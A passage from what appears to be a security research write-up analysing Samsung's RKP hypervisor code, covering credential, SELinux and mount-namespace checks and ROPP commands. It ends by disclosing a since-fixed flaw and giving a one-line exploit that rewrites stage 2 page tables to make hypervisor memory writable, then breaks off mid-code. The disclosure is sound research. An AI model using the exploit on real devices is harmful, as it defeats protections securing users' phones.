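To make the SYSTEM boundary concrete, here is a small illustrative snippet of ours: it simply reuses the logic above with example Android IDs (the concrete values are ours, not taken from the RKP binary).
#include <assert.h>
#include <stdint.h>

// Illustrative re-implementation of `check_pe_id`.
static int64_t check_pe_id(uint32_t targ_id, uint32_t curr_id) {
  return curr_id > 1000 && targ_id <= 1000;
}

int main(void) {
  assert(check_pe_id(0, 2000) == 1);    // shell (2000) switching to root (0) is flagged.
  assert(check_pe_id(0, 1000) == 0);    // system (1000) switching to root (0) is not: the current ID must be strictly above SYSTEM.
  assert(check_pe_id(1001, 2000) == 0); // a target ID above SYSTEM is never flagged.
  return 0;
}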
from_zyg_adbd is called under the same conditions as rkp_check_pe. It returns true if the current task is marked CRED_FLAG_CHILD_PPT or if it is a child of zygote, zygote64, or adbd.
int64_t from_zyg_adbd(int64_t curr_task, int64_t curr_cred) {
// ...
// Get the type field from the current cred structure.
curr_flags = *(curr_cred + 8 * rkp_cred->CRED_FLAGS_OFFSET);
// If the current task is marked as CRED_FLAG_CHILD_PPT, return true.
if ((curr_flags & CRED_FLAG_CHILD_PPT) != 0) {
return 1;
}
// Iterate on the parents of the current task_struct.
task = curr_task;
while (1) {
// Get the pid field of the parent task_struct.
task_pid = *(task + 4 * rkp_cred->TASK_PID_OFFSET);
// If the parent pid is zero, return false.
if (!task_pid) {
return 0;
}
// Get the comm field of the parent task_struct.
task_comm = task + 8 * rkp_cred->TASK_COMM_OFFSET;
// Copy the task name into a local buffer.
memcpy(comm, task_comm, sizeof(comm));
// If the parent task is zygote, zygote64 or adbd, return true.
if (!strcmp(comm, "zygote") || !strcmp(comm, "zygote64") || !strcmp(comm, "adbd")) {
return 1;
}
// Get the parent field of the parent task_struct.
parent_va = *(task + 8 * rkp_cred->TASK_PARENT_OFFSET);
// Convert the parent task_struct from a VA to a PA.
task = parent_pa = rkp_get_pa(parent_va);
}
}
check_privilege_escalation is called for each UID, EUID, GID, and EGID pair of the target RW cred and current cred structures. It returns true if the current ID is LOD-prefixed (0x61a8xxxx) but the target ID is not, and the target ID is not -1.
bool check_privilege_escalation(int32_t targ_id, int32_t curr_id) {
// PE is detected if the current ID is LOD prefixed but the target ID is not, and the target ID is not -1.
return ((curr_id - 0x61a80000) <= 0xffff && (targ_id - 0x61a80000) > 0xffff && targ_id != -1);
}
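Here is a similar sketch of ours for the LOD prefix check; the concrete IDs are again made up, and we assume the comparisons are done on unsigned values (otherwise the prefix test would not behave as described above).
#include <assert.h>
#include <stdint.h>

// Illustrative re-implementation of `check_privilege_escalation`, assuming unsigned comparisons.
static int check_privilege_escalation(int32_t targ_id, int32_t curr_id) {
  return (uint32_t)(curr_id - 0x61a80000) <= 0xffff &&
         (uint32_t)(targ_id - 0x61a80000) > 0xffff && targ_id != -1;
}

int main(void) {
  assert(check_privilege_escalation(0, 0x61a803e8) == 1);          // LOD system switching to root is flagged.
  assert(check_privilege_escalation(0x61a80000, 0x61a803e8) == 0); // switching to another LOD ID is allowed.
  assert(check_privilege_escalation(-1, 0x61a803e8) == 0);         // a target ID of -1 is ignored.
  assert(check_privilege_escalation(0, 1000) == 0);                // a non-LOD current ID is ignored.
  return 0;
}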
When privilege escalation is detected in rkp_assign_creds, rkp_privilege_escalation is called. It simply triggers a policy violation.
int64_t rkp_privilege_escalation(int64_t targ_cred, int64_t curr_cred, int64_t flag) {
uh_log('L', "rkp_kdp.c", 461, "Priv Escalation - Current %lx %lx %lx", *(curr_cred + 4 * rkp_cred->CRED_UID_OFFSET),
*(curr_cred + 4 * rkp_cred->CRED_GID_OFFSET), *(curr_cred + 4 * rkp_cred->CRED_EGID_OFFSET));
uh_log('L', "rkp_kdp.c", 462, "Priv Escalation - Passed %lx %lx %lx", *(targ_cred + 4 * rkp_cred->CRED_UID_OFFSET),
*(targ_cred + 4 * rkp_cred->CRED_GID_OFFSET), *(targ_cred + 4 * rkp_cred->CRED_EGID_OFFSET));
return rkp_policy_violation("KDP Privilege Escalation %lx %lx %lx", targ_cred, curr_cred, flag);
}
The chk_invalid_sec_ptr function is called to verify that the new task_security_struct is valid (aligned on the structure size) and hypervisor-protected (marked as SEC_PTR in the physmap).
int64_t chk_invalid_sec_ptr(uint64_t sec_ptr) {
rkp_phys_map_lock(sec_ptr);
// The start and end addresses of the task_security_struct must be marked as `SEC_PTR` on the physmap, and it must
// also be aligned on the size of this structure.
if (!sec_ptr || !is_phys_map_sec_ptr(sec_ptr) || !is_phys_map_sec_ptr(sec_ptr + rkp_cred->SP_SIZE - 1) ||
sec_ptr != sec_ptr / rkp_cred->SP_BUFF_SIZE * rkp_cred->SP_BUFF_SIZE) {
uh_log('L', "rkp_kdp.c", 186, "Invalid Sec Pointer %lx %lx %lx", is_phys_map_sec_ptr(sec_ptr), sec_ptr,
sec_ptr - sec_ptr / rkp_cred->SP_BUFF_SIZE * rkp_cred->SP_BUFF_SIZE);
rkp_phys_map_unlock(sec_ptr);
return 1;
}
rkp_phys_map_unlock(sec_ptr);
return 0;
}
In addition to protecting the task_security_struct of each task, and making the selinux_enforcing and selinux_enabled global variables read-only, Samsung RKP also protects ss_initialized. This global variable, which indicates if SELinux is initialized, was targeted in a previous RKP bypass. To set this variable after the policy has been loaded, the kernel calls the hypervisor in the security_load_policy function. This function invokes the RKP_KDP_X60 command.
int security_load_policy(void *data, size_t len)
{
// ...
uh_call(UH_APP_RKP, RKP_KDP_X60, (u64)&ss_initialized, 1, 0, 0);
// ...
}
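As a side note, here is a minimal sketch of what the kernel-side uh_call wrapper might look like. This is only our assumption, based on the UH_APP_RKP value (0xc300c002) built by the ropp_load_mk macro shown later in this post and on the command handlers reading their arguments from registers x2 to x5; the actual kernel implementation, and whether it uses an smc or an hvc instruction to reach the hypervisor, depends on the platform.
#include <linux/types.h>

/* Hypothetical sketch, not the actual Samsung code: the uH application ID goes
 * in x0, the command in x1, and up to four arguments in x2 to x5. */
static void uh_call_sketch(u64 app_id, u64 cmd, u64 arg0, u64 arg1, u64 arg2, u64 arg3)
{
    register u64 x0 asm("x0") = app_id; /* e.g. UH_APP_RKP = 0xc300c002 */
    register u64 x1 asm("x1") = cmd;
    register u64 x2 asm("x2") = arg0;
    register u64 x3 asm("x3") = arg1;
    register u64 x4 asm("x4") = arg2;
    register u64 x5 asm("x5") = arg3;

    /* The ropp_load_mk macro uses smc #0; other platforms may use hvc instead. */
    asm volatile("smc #0"
                 : "+r"(x0), "+r"(x1), "+r"(x2), "+r"(x3), "+r"(x4), "+r"(x5)
                 :
                 : "memory");
}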
On the hypervisor side, this command is handled by the rkp_cmd_selinux_initialized function, which calls rkp_selinux_initialized. This function ensures ss_initialized is located in the kernel's rodata section and that the kernel is setting it to 1, before performing the write.
void rkp_selinux_initialized(saved_regs_t* regs) {
// ...
// Get the VA of `ss_initialized` from register x2.
ss_initialized_va = regs->x2;
// Get the value to set it to from register x3.
value = regs->x3;
// Convert the VA of `ss_initialized` to a PA.
ss_initialized = rkp_get_pa(ss_initialized_va);
if (ss_initialized) {
// Ensure the `ss_initialized` is located in the kernel rodata section.
if (ss_initialized_va < SRODATA || ss_initialized_va > ERODATA) {
// Trigger a policy violation if it isn't.
rkp_policy_violation("RKP_ba9b5794 %lxRKP_69d2a377%lx, %lxRKP_ba5ec51d", ss_initialized_va);
}
// Ensure it is located at the same address that was set in `rkp_cred_init` and provided by the kernel in
// `kdp_init`.
else if (ss_initialized == rkp_cred->SS_INITIALIZED_VA) {
// The global variable can only be set to 1, never to any other value.
if (value == 1) {
// Perform the write on behalf of the kernel.
*ss_initialized = value;
uh_log('L', "rkp_kdp.c", 1199, "RKP_3a152688 %d", 1);
} else {
// Trigger a policy violation for other values.
rkp_policy_violation("RKP_3ba4a93d");
}
}
// Not sure what this is about. SELINUX is the PA of the selinux field of the rkp_init_t structure located on the
// stack of the kernel function `kdp_init`. Maybe this is here to support older or future kernel versions?
else if (ss_initialized == rkp_cred->SELINUX) {
// This global variable can only be changed from any value but 1 to 1.
if (value == 1 || *ss_initialized != 1) {
// Perform the write on behalf of the kernel.
*ss_initialized = value;
uh_log('L', "rkp_kdp.c", 1212, "RKP_8df36e46 %d", value);
} else {
// Trigger a policy violation for other values.
rkp_policy_violation("RKP_cef38ae5");
}
}
// Trigger a policy violation if the address is unexpected.
else {
rkp_policy_violation("RKP_ced87e02");
}
} else {
uh_log('L', "rkp_kdp.c", 1181, "RKP_0a7ac3b1\n");
}
}
One last feature offered by the hypervisor is the protection of the mount namespaces (a set of filesystem mounts that are visible to a process).
The vfsmount instances, like the cred and task_security_struct structure instances, are allocated in read-only pages. This structure also gets a new field for storing the back-pointer to the mount structure that owns this instance.
struct vfsmount {
// ...
struct mount *bp_mount; /* pointer to mount*/
// ...
} __randomize_layout;
The mount structure was also modified to contain a pointer to the vfsmount structure, instead of the structure itself.
struct mount {
// ...
struct vfsmount *mnt;
// ...
} __randomize_layout;
In the Credentials Protection section, we explained that the security_integrity_current function is called in each SELinux security hook and that this function calls cmp_ns_integrity to verify the integrity of the mount namespace.
cmp_ns_integrity retrieves the nsproxy structure (that contains pointers to all per-process namespaces) for the current task, the mnt_namespace from it, and the root mount from this structure. The integrity verification is then performed by checking if the back-pointer of the vfsmount structure points to the mount structure.
extern u8 ns_prot;
unsigned int cmp_ns_integrity(void)
{
struct mount *root = NULL;
struct nsproxy *nsp = NULL;
int ret = 0;
if((in_interrupt()
|| in_softirq())){
return 0;
}
nsp = current->nsproxy;
if(!ns_prot || !nsp ||
!nsp->mnt_ns) {
return 0;
}
root = current->nsproxy->mnt_ns->root;
if(root != root->mnt->bp_mount){
printk("\n RKP44_3 Name Space Mismatch %p != %p\n nsp = %p mnt_ns %p\n",root,root->mnt->bp_mount,nsp,nsp->mnt_ns);
ret = 1;
}
return ret;
}
The vfsmount structures are allocated in the mnt_alloc_vfsmount function, using the read-only vfsmnt_cache cache. This function calls rkp_init_ns to initialize the back-pointer.
static int mnt_alloc_vfsmount(struct mount *mnt)
{
struct vfsmount *vfsmnt = NULL;
vfsmnt = kmem_cache_alloc(vfsmnt_cache, GFP_KERNEL);
if(!vfsmnt)
return 1;
spin_lock(&mnt_vfsmnt_lock);
rkp_init_ns(vfsmnt,mnt);
// vfsmnt->bp_mount = mnt;
mnt->mnt = vfsmnt;
spin_unlock(&mnt_vfsmnt_lock);
return 0;
}
And rkp_init_ns simply invokes the RKP_KDP_X52 command, passing it the vfsmount and mount instances.
void rkp_init_ns(struct vfsmount *vfsmnt,struct mount *mnt)
{
uh_call(UH_APP_RKP, RKP_KDP_X52, (u64)vfsmnt, (u64)mnt, 0, 0);
}
On the hypervisor side, the command is handled by the rkp_cmd_init_ns function, which calls rkp_init_ns_hyp. It calls chk_invalid_ns to verify that the new vfsmount structure is valid before memset'ing it and setting its back-pointer to the mount instance.
void rkp_init_ns_hyp(saved_regs_t* regs) {
// ...
// Convert the VA of the vfsmount structure into a PA.
vfsmnt = rkp_get_pa(regs->x2);
// Ensure the structure is valid and hypervisor-protected.
if (!chk_invalid_ns(vfsmnt)) {
// Reset all of its content.
memset(vfsmnt, 0, rkp_cred->NS_SIZE);
// Set the back-pointer to the mount structure given as argument.
*(vfsmnt + 8 * rkp_cred->BPMNT_VFSMNT_OFFSET) = regs->x3;
}
}
chk_invalid_ns verifies that the new vfsmount instance is valid (aligned on the structure size) and is hypervisor-protected (marked as NS in the physmap).
int64_t chk_invalid_ns(uint64_t vfsmnt) {
// The vfsmount instance must be aligned on the size of the structure.
if (!vfsmnt || vfsmnt != vfsmnt / rkp_cred->NS_BUFF_SIZE * rkp_cred->NS_BUFF_SIZE) {
return 1;
}
rkp_phys_map_lock(vfsmnt);
// Ensure it is marked as `NS` in the physmap.
if (!is_phys_map_ns(vfsmnt)) {
uh_log('L', "rkp_kdp.c", 882, "Name space physmap verification failed !!!!! %lx", vfsmnt);
rkp_phys_map_unlock(vfsmnt);
return 1;
}
rkp_phys_map_unlock(vfsmnt);
return 0;
}
The vfsmount structure contains various fields that need to be changed at some point by the kernel. Similarly to other protected structures, it cannot do that by itself and needs to call into the hypervisor instead.
The table below lists, for each field, the kernel function invoking the command and the hypervisor function handling that command.
Field | Kernel Function | Hypervisor Function |
---|---|---|
mnt_root/mnt_sb | rkp_set_mnt_root_sb | rkp_cmd_ns_set_root_sb |
mnt_flags | rkp_assign_mnt_flags | rkp_cmd_ns_set_flags |
data | rkp_set_data | rkp_cmd_ns_set_data |
The mnt_root field, a pointer to the root of the mounted tree (an instance of the dentry structure), and the mnt_sb field, a pointer to the super_block structure, are changed using the rkp_set_mnt_root_sb function, which invokes the RKP_KDP_X53 command.
void rkp_set_mnt_root_sb(struct vfsmount *mnt, struct dentry *mnt_root,struct super_block *mnt_sb)
{
uh_call(UH_APP_RKP, RKP_KDP_X53, (u64)mnt, (u64)mnt_root, (u64)mnt_sb, 0);
}
This command is handled by the rkp_cmd_ns_set_root_sb hypervisor function, which calls rkp_ns_set_root_sb. This function calls chk_invalid_ns to check the vfsmount integrity and sets its mnt_root and mnt_sb fields to the values provided as arguments.
void rkp_ns_set_root_sb(saved_regs_t* regs) {
// ...
// Convert the vfsmount structure VA into a PA.
vfsmnt = rkp_get_pa(regs->x2);
// Ensure the structure is valid and hypervisor-protected.
if (!chk_invalid_ns(vfsmnt)) {
// Set the mnt_root field of the vfsmount structure to the dentry instance.
*vfsmnt = regs->x3;
// Set the mnt_sb field of the vfsmount structure to the super_block instance.
*(vfsmnt + 8 * rkp_cred->SB_VFSMNT_OFFSET) = regs->x4;
}
}
The mnt_flags field, which contains flags such as MNT_NOSUID, MNT_NODEV, MNT_NOEXEC, etc., is changed using the rkp_assign_mnt_flags function, which invokes the RKP_KDP_X54 command.
void rkp_assign_mnt_flags(struct vfsmount *mnt,int flags)
{
uh_call(UH_APP_RKP, RKP_KDP_X54, (u64)mnt, (u64)flags, 0, 0);
}
Two other functions call rkp_assign_mnt_flags. The first one, rkp_set_mnt_flags, is used to set one or more flags.
void rkp_set_mnt_flags(struct vfsmount *mnt,int flags)
{
int f = mnt->mnt_flags;
f |= flags;
rkp_assign_mnt_flags(mnt,f);
}
Unsurprisingly, the second one, rkp_reset_mnt_flags, is used to unset one or more flags.
void rkp_reset_mnt_flags(struct vfsmount *mnt,int flags)
{
int f = mnt->mnt_flags;
f &= ~flags;
rkp_assign_mnt_flags(mnt,f);
}
This command is handled by the rkp_cmd_ns_set_flags hypervisor function, which calls rkp_ns_set_flags. This function calls chk_invalid_ns to check the vfsmount integrity and sets its flags field to the value provided as an argument.
void rkp_ns_set_flags(saved_regs_t* regs) {
// ...
// Convert the vfsmount structure VA into a PA.
vfsmnt = rkp_get_pa(regs->x2);
// Ensure the structure is valid and hypervisor-protected.
if (!chk_invalid_ns(vfsmnt)) {
// Set the flags field of the vfsmount structure.
*(vfsmnt + 4 * rkp_cred->FLAGS_VFSMNT_OFFSET) = regs->x3;
}
}
The data field, which contains type-specific data, is changed using the rkp_set_data function, which invokes the RKP_KDP_X55 command.
void rkp_set_data(struct vfsmount *mnt,void *data)
{
uh_call(UH_APP_RKP, RKP_KDP_X55, (u64)mnt, (u64)data, 0, 0);
}
This command is handled by the rkp_cmd_ns_set_data hypervisor function, which calls rkp_ns_set_data. This function calls chk_invalid_ns to check the vfsmount integrity and sets its data field to the value provided as an argument.
void rkp_ns_set_data(saved_regs_t* regs) {
// ...
// Convert the vfsmount structure VA into a PA.
vfsmnt = rkp_get_pa(regs->x2);
// Ensure the structure is valid and hypervisor-protected.
if (!chk_invalid_ns(vfsmnt)) {
// Set the data field of the vfsmount structure.
*(vfsmnt + 8 * rkp_cred->DATA_VFSMNT_OFFSET) = regs->x3;
}
}
The last command that is called as part of the namespace protection feature is RKP_KDP_X56. It is called when a new mount is being created, by the rkp_populate_sb function. This function checks the path of the mount point against the list below, then calls the hypervisor if it is one of these specific paths.
/root
/product
/system
/vendor
/apex/com.android.runtime
/com.android.runtime@1
int art_count = 0;
static void rkp_populate_sb(char *mount_point, struct vfsmount *mnt)
{
if (!mount_point || !mnt)
return;
if (!odm_sb &&
!strncmp(mount_point, KDP_MOUNT_PRODUCT, KDP_MOUNT_PRODUCT_LEN)) {
uh_call(UH_APP_RKP, RKP_KDP_X56, (u64)&odm_sb, (u64)mnt, KDP_SB_ODM, 0);
} else if (!rootfs_sb &&
!strncmp(mount_point, KDP_MOUNT_ROOTFS, KDP_MOUNT_ROOTFS_LEN)) {
uh_call(UH_APP_RKP, RKP_KDP_X56, (u64)&rootfs_sb, (u64)mnt, KDP_SB_SYS, 0);
} else if (!sys_sb &&
!strncmp(mount_point, KDP_MOUNT_SYSTEM, KDP_MOUNT_SYSTEM_LEN)) {
uh_call(UH_APP_RKP, RKP_KDP_X56, (u64)&sys_sb, (u64)mnt, KDP_SB_SYS, 0);
} else if (!vendor_sb &&
!strncmp(mount_point, KDP_MOUNT_VENDOR, KDP_MOUNT_VENDOR_LEN)) {
uh_call(UH_APP_RKP, RKP_KDP_X56, (u64)&vendor_sb, (u64)mnt, KDP_SB_VENDOR, 0);
} else if (!art_sb &&
!strncmp(mount_point, KDP_MOUNT_ART, KDP_MOUNT_ART_LEN - 1)) {
uh_call(UH_APP_RKP, RKP_KDP_X56, (u64)&art_sb, (u64)mnt, KDP_SB_ART, 0);
} else if ((art_count < ART_ALLOW) &&
!strncmp(mount_point, KDP_MOUNT_ART2, KDP_MOUNT_ART2_LEN - 1)) {
if (art_count)
uh_call(UH_APP_RKP, RKP_KDP_X56, (u64)&art_sb, (u64)mnt, KDP_SB_ART, 0);
art_count++;
}
}
rkp_populate_sb is called from do_new_mount, which itself is called from do_mount.
static int do_new_mount(struct path *path, const char *fstype, int sb_flags,
int mnt_flags, const char *name, void *data)
{
// ...
buf = kzalloc(PATH_MAX, GFP_KERNEL);
if (!buf){
kfree(buf);
return -ENOMEM;
}
dir_name = dentry_path_raw(path->dentry, buf, PATH_MAX);
if(!sys_sb || !odm_sb || !vendor_sb || !rootfs_sb || !art_sb || (art_count < ART_ALLOW))
rkp_populate_sb(dir_name,mnt);
kfree(buf);
// ...
}
On the hypervisor side, the command is handled by rkp_cmd_ns_set_sys_vfsmnt, which calls rkp_ns_set_sys_vfsmnt. It ensures the vfsmount structure given as an argument is valid by calling chk_invalid_ns. It then copies its mnt_sb field, the pointer to the superblock of the source file system mount, into the destination superblock pointer, before storing this value again in one of the fields of the rkp_cred structure.
void* rkp_ns_set_sys_vfsmnt(saved_regs_t* regs) {
// ...
// If the `rkp_cred` structure is not initialized, i.e. `rkp_cred_init` has not been called.
if (!rkp_cred) {
uh_log('W', "rkp_kdp.c", 931, "RKP_ae6cae81");
return;
}
// Convert the destination superblock VA to a PA.
dst_sb = rkp_get_pa(regs->x2);
// Convert the source file system mount VA to a PA.
vfsmnt = rkp_get_pa(regs->x3);
// Get the enum value indicating which mount point this is.
mount_point = regs->x4;
// Ensure the vfsmnt structure is valid and hypervisor-protected.
if (!vfsmnt || chk_invalid_ns(vfsmnt) || mount_point >= KDP_SB_MAX) {
uh_log('L', "rkp_kdp.c", 945, "Invalid source vfsmnt %lx %lx %lx\n", regs->x3, vfsmnt, mount_point);
return;
}
// Sanity-check: the destination superblock must not be NULL.
if (!dst_sb) {
uh_log('L', "rkp_kdp.c", 956, "dst_sb is NULL %lx %lx %lx\n", regs->x2, 0, regs->x3);
return;
}
// Get the mnt_sb field (pointer to superblock) of the vfsmount structure.
mnt_sb = *(vfsmnt + 8 * rkp_cred->SB_VFSMNT_OFFSET);
// Set the pointer to the destination superblock to the mnt_sb field value.
*dst_sb = mnt_sb;
// Depending on the mount point, set the corresponding field of the `rkp_cred` structure.
switch (mount_point) {
case KDP_SB_ROOTFS:
*rkp_cred->SB_ROOTFS = mnt_sb;
break;
case KDP_SB_ODM:
*rkp_cred->SB_ODM = mnt_sb;
break;
case KDP_SB_SYS:
*rkp_cred->SB_SYS = mnt_sb;
break;
case KDP_SB_VENDOR:
*rkp_cred->SB_VENDOR = mnt_sb;
break;
case KDP_SB_ART:
*rkp_cred->SB_ART = mnt_sb;
break;
}
}
The mount namespace protection feature enables additional checking when executable binaries are loaded by the kernel. The verifications happen in the flush_old_exec function, which is called from the loaders of the supported binary formats (see this LWN.net article). This mechanism also prevents the abuse of the call_usermodehelper function that was used in a previous Samsung RKP bypass.
If the current task is privileged, determined by calling is_rkp_priv_task, the flush_old_exec function will call invalid_drive to ensure the executable's mount point is valid. If it is not, it will make the kernel panic.
int flush_old_exec(struct linux_binprm * bprm)
{
// ...
if(rkp_cred_enable &&
is_rkp_priv_task() &&
invalid_drive(bprm)) {
panic("\n KDP_NS_PROT: Illegal Execution of file #%s#\n", bprm->filename);
}
// ...
}
is_rkp_priv_task simply checks if any of the UID, EUID, GID, or EGID of the current task is below or equal to 1000 (SYSTEM).
#define RKP_CRED_SYS_ID 1000
static int is_rkp_priv_task(void)
{
struct cred *cred = (struct cred *)current_cred();
if(cred->uid.val <= (uid_t)RKP_CRED_SYS_ID || cred->euid.val <= (uid_t)RKP_CRED_SYS_ID ||
cred->gid.val <= (gid_t)RKP_CRED_SYS_ID || cred->egid.val <= (gid_t)RKP_CRED_SYS_ID ){
return 1;
}
return 0;
}
invalid_drive first retrieves the vfsmount structure from the file structure of the binary being loaded. It ensures it is hypervisor-protected by calling rkp_ro_page (though that doesn't mean it is necessarily of the expected type). It then passes its superblock to the kdp_check_sb_mismatch function to determine whether or not the mount point is valid.
static int invalid_drive(struct linux_binprm * bprm)
{
struct super_block *sb = NULL;
struct vfsmount *vfsmnt = NULL;
vfsmnt = bprm->file->f_path.mnt;
if(!vfsmnt ||
!rkp_ro_page((unsigned long)vfsmnt)) {
printk("\nInvalid Drive #%s# #%p#\n",bprm->filename, vfsmnt);
return 1;
}
sb = vfsmnt->mnt_sb;
if(kdp_check_sb_mismatch(sb)) {
printk("\n Superblock Mismatch #%s# vfsmnt #%p#sb #%p:%p:%p:%p:%p:%p#\n",
bprm->filename, vfsmnt, sb, rootfs_sb, sys_sb, odm_sb, vendor_sb, art_sb);
return 1;
}
return 0;
}
kdp_check_sb_mismatch, if the device is not in recovery and not unlocked, compares the superblock to the allowed ones, i.e. /root, /system, /product, /vendor, and /apex/com.android.runtime.
static int kdp_check_sb_mismatch(struct super_block *sb)
{
if(is_recovery || __check_verifiedboot) {
return 0;
}
if((sb != rootfs_sb) && (sb != sys_sb)
&& (sb != odm_sb) && (sb != vendor_sb) && (sb != art_sb)) {
return 1;
}
return 0;
}
We explained in the section about Kernel Exploitation that JOPP is only enabled on the high-end Samsung devices and ROPP on the high-end Snapdragon devices. For this subsection about the hypervisor commands related to these features, we will be looking at the kernel source code and RKP binary for a Snapdragon device (the US version of the S10).
We believe the initialization commands of JOPP and ROPP in the hypervisor, rkp_cmd_jopp_init and rkp_cmd_ropp_init, respectively, are called by the bootloader (S-Boot), though we couldn't confirm it.
The first command handler, rkp_cmd_jopp_init, does nothing interesting.
int64_t rkp_cmd_jopp_init() {
uh_log('L', "rkp.c", 502, "CFP JOPP Enabled");
return 0;
}
The second command handler, rkp_cmd_ropp_init, expects an argument structure that needs to start with a magic value (0x4A4C4955). This structure is copied to a fixed physical address (0xB0240020). If the memory at another physical address (0x80001000) matches another magic value (0xCDEFCDEF), the structure is copied again to a last physical address (0x80001020).
int64_t rkp_cmd_ropp_init(saved_regs_t* regs) {
// ...
// Convert the argument structure VA to a PA.
arg_struct = virt_to_phys_el1(regs->x2);
// Check if it begins with the expected magic value.
if (*arg_struct == 0x4a4c4955) {
// Copy the structure to a fixed physical address.
memcpy(0xb0240020, arg_struct, 80);
// If the memory at another PA contains another magic value.
if (*(uint32_t*)0x80001000 == 0xcdefcdef) {
// Copy the structure to another fixed PA.
memcpy(0x80001020, arg_struct, 80);
}
uh_log('L', "rkp.c", 529, "CFP ROPP Enabled");
} else {
uh_log('W', "rkp.c", 515, "RKP_e08bc280");
}
return 0;
}
In addition, ROPP uses two more commands, rkp_cmd_ropp_save and rkp_cmd_ropp_reload, that deal with the "master key".
rkp_cmd_ropp_save does nothing and is probably called by the bootloader, but we again couldn't confirm it.
int64_t rkp_cmd_ropp_save() {
return 0;
}
rkp_cmd_ropp_reload is called by the kernel in the ropp_secondary_init assembly macro.
/*
* secondary core will start a forked thread, so rrk is already enc'ed
* so only need to reload the master key and thread key
*/
.macro ropp_secondary_init ti
reset_sysreg
//load master key from rkp
ropp_load_mk
//load thread key
ropp_load_key \ti
.endm
.macro ropp_load_mk
#ifdef CONFIG_UH
push x0, x1
push x2, x3
push x4, x5
mov x1, #0x10 //RKP_ROPP_RELOAD
mov x0, #0xc002 //UH_APP_RKP
movk x0, #0xc300, lsl #16
smc #0x0
pop x4, x5
pop x2, x3
pop x0, x1
#else
push x0, x1
ldr x0, = ropp_master_key
ldr x0, [x0]
msr RRMK, x0
pop x0, x1
#endif
.endm
This macro is called from the __secondary_switched assembly function, which is executed when a secondary core is being booted.
__secondary_switched:
// ...
ropp_secondary_init x2
// ...
ENDPROC(__secondary_switched)
The command handler itself, rkp_cmd_ropp_reload, sets the system register DBGBVR5_EL1 (that holds the RRMK, or "master key", used by the ROPP feature) to a value read from a fixed physical address (0xB0240028).
int64_t rkp_cmd_ropp_reload() {
set_dbgbvr5_el1(*(uint32_t*)0xb0240028);
return 0;
}
This completes our explanations about Samsung RKP's inner workings. We have detailed how the hypervisor is initialized, how it handles exceptions coming from lower ELs, and how it processes the kernel page tables — all of that to protect critical kernel data structures that might be targeted in an exploit.
We will now reveal a vulnerability that we found, and that has since been fixed, which allows getting code execution at EL2. We will exploit this vulnerability on our Exynos device, but it should also work on Snapdragon devices with some minor changes.
Here is some information about the binaries that we are looking at:
A515FXXU3BTF4 (built on Feb 27 2020)
G973USQU4ETH7 (built on Feb 25 2020)
If you have been paying close attention while reading this blog post, you might have noticed two important functions that we haven't detailed yet: uh_log and rkp_get_pa. Let's go over them now, starting with uh_log.
uh_log does some fairly standard string formatting and printing, which we have omitted from the snippet below, but it also does other things. If the log level given as the first argument is 'D' (debug), then it also calls uh_panic. This will become important in a moment...
int64_t uh_log(char level, const char* filename, uint32_t linenum, const char* message, ...) {
// ...
// ...
if (level == 'D') {
uh_panic();
}
return res;
}
Now we turn our attention to rkp_get_pa, which is called by a lot of command handlers to convert kernel input. If the virtual address is in the fixmap, it calculates the physical address from the PHYS_OFFSET (start of the kernel physical memory). If it is not in the fixmap, it calls virt_to_phys_el1 to perform a hardware translation. If that hardware translation doesn't succeed, it calculates the physical address from the KIMAGE_VOFFSET (offset between kernel VAs and PAs). Finally, it calls check_kernel_input to check if that address can be used or not.
int64_t rkp_get_pa(uint64_t vaddr) {
// ...
if (!vaddr) {
return 0;
}
if (vaddr < 0xffffffc000000000) {
paddr = virt_to_phys_el1(vaddr);
if (!paddr) {
if ((vaddr & 0x4000000000) != 0) {
paddr = PHYS_OFFSET + (vaddr & 0x3fffffffff);
} else {
paddr = vaddr - KIMAGE_VOFFSET;
}
}
} else {
paddr = PHYS_OFFSET + (vaddr & 0x3fffffffff);
}
check_kernel_input(paddr);
return paddr;
}
virt_to_phys_el1 uses the AT S12E1R (stage 1 & 2 at EL1, read access) instruction to translate the virtual address. If that translation, simulating a kernel read access, fails, it uses the AT S12E1W (stage 1 & 2 at EL1, write access) instruction. If that translation, simulating a kernel write access, also fails and the MMU is enabled, it will print the stack contents.
int64_t virt_to_phys_el1(int64_t vaddr) {
// ...
if (vaddr) {
at_s12e1r(vaddr);
par_el1 = get_par_el1();
if ((par_el1 & 1) != 0) {
at_s12e1w(vaddr);
par_el1 = get_par_el1();
}
if ((par_el1 & 1) != 0) {
if ((get_sctlr_el1() & 1) != 0) {
uh_log('W', "general.c", 128, "%s: wrong address %p", "virt_to_phys_el1", vaddr);
if (!has_printed_stack_contents) {
has_printed_stack_contents = 1;
print_stack_contents();
}
has_printed_stack_contents = 0;
}
vaddr = 0;
} else {
vaddr = par_el1 & 0xfffffffff000 | vaddr & 0xfff;
}
}
return vaddr;
}
The check_kernel_input function checks whether the kernel-provided VA, once converted into a PA, can be used safely. It only checks if the physical address is contained in the protected_ranges memlist. As stated in the Overall State After Startup section, after startup this memlist contains:
the hypervisor (uH) memory, added in pa_restrict_init;
the physmap, added in init_cmd_initialize_dynamic_heap.
int64_t check_kernel_input(uint64_t paddr) {
// ...
res = protected_ranges_contains(paddr);
if (res) {
res = uh_log('L', "pa_restrict.c", 94, "Error kernel input falls into uH range, pa_from_kernel : %lx", paddr);
}
return res;
}
This should effectively prevent the kernel from giving an address that, once translated, falls into hypervisor memory. However, if the check fails, the uh_log function is called with an 'L' level and not a 'D' one, meaning that the hypervisor will not panic and execution will continue as if nothing ever happened. The impact of this simple mistake is huge: we can give addresses inside hypervisor memory to all command handlers.
Exploiting this vulnerability is trivial. It suffices to call one of the command handlers with the right arguments to immediately obtain an arbitrary write. For example, we can use the RKP_CMD_WRITE_PGT3 command, which is handled by the rkp_l3pgt_write function that we have seen earlier. It is only a matter of finding what to write and where to write it to compromise the hypervisor.
Below is our one-liner exploit that targets the stage 2 page tables of our device by adding a level 2 block descriptor that spans the whole hypervisor memory. By setting the S2AP field of the descriptor to 0b11, the memory mapping becomes writable, and because the WXN bit set in s1_enable only applies to the address translation at EL2 and not at EL1, we can now freely modify the hypervisor code from the kernel.
uh_call(UH_APP_RKP, RKP_CMD_WRITE_PGT3, 0xffffffc00702a1c0, 0x870004fd);
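To illustrate why this particular value gives us write access, here is a rough breakdown of the descriptor. It assumes the standard ARMv8 (VMSAv8-64) stage 2 block descriptor format, and that the 2 MB block starting at physical address 0x87000000 covers the hypervisor memory of our device.
#include <stdint.h>
#include <stdio.h>

int main(void) {
  // Rough breakdown of the level 2 block descriptor used in the exploit.
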